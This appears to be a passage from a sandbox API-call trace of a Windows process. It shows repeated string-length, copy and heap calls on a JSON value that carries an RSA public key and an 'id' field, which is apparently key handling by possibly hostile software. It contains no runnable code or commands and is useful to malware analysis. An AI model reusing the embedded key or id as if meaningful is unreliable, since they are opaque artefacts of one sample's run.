KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.204] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0167.204] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b8420 | out: hHeap=0x260000) returned 1 [0167.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0167.205] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x444) returned 0x31c13d0 [0167.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc2a778, cbMultiByte=-1, lpWideCharStr=0x31c13d0, cchWideChar=546 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 546 [0167.205] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0167.205] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0167.205] lstrlenA (lpString="\",\"id\":\"") returned 8 [0167.205] lstrcpyA (in: lpString1=0xfc2ab78, lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: 